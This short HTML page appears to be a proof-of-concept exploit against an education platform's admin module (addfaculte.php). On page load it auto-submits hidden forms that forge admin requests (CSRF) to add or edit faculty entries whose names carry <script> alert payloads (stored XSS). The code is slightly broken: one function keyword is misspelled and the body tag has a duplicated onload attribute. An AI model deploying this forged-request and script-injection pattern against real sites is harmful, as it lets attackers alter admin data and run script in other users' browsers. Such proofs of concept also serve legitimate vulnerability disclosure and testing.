<body onload="bam()" onload='boomboom()'>
<form id='form1' method="post" action="http://localhost:1180/modules/admin/addfaculte.php?a=3&c=1">



<td><input type='text' name='codefaculte' value='TMA' readonly='1' />
<td><input type='text' name='faculte' value='<script>alert("TMA XSS Attack");</script>' />
<td><input type='hidden' name='c' value='1' />
<input type='submit' name='edit' value='Επικύρωση Αλλαγών' id='boom'/></td></td></td></form>

<form id='form2'method="post" action="http://localhost:1180/modules/admin/addfaculte.php?a=1">
<td><input class='FormData_InputText' type='text' name='codefaculte' value='TMBomb' /></td>
<td><input class='FormData_InputText' type='text' name='faculte' value='<script>alert("Department Name");</script>' /></td>
<td><input type='submit' name='add' value='Προσθήκη' id='bam'/></td></form>


<script type="text/javascript">
	funtion bam() {
		document.getElementById("bam").click();
	}
    function boomboom() {
        document.getElementById("boom").click();
      }
</script>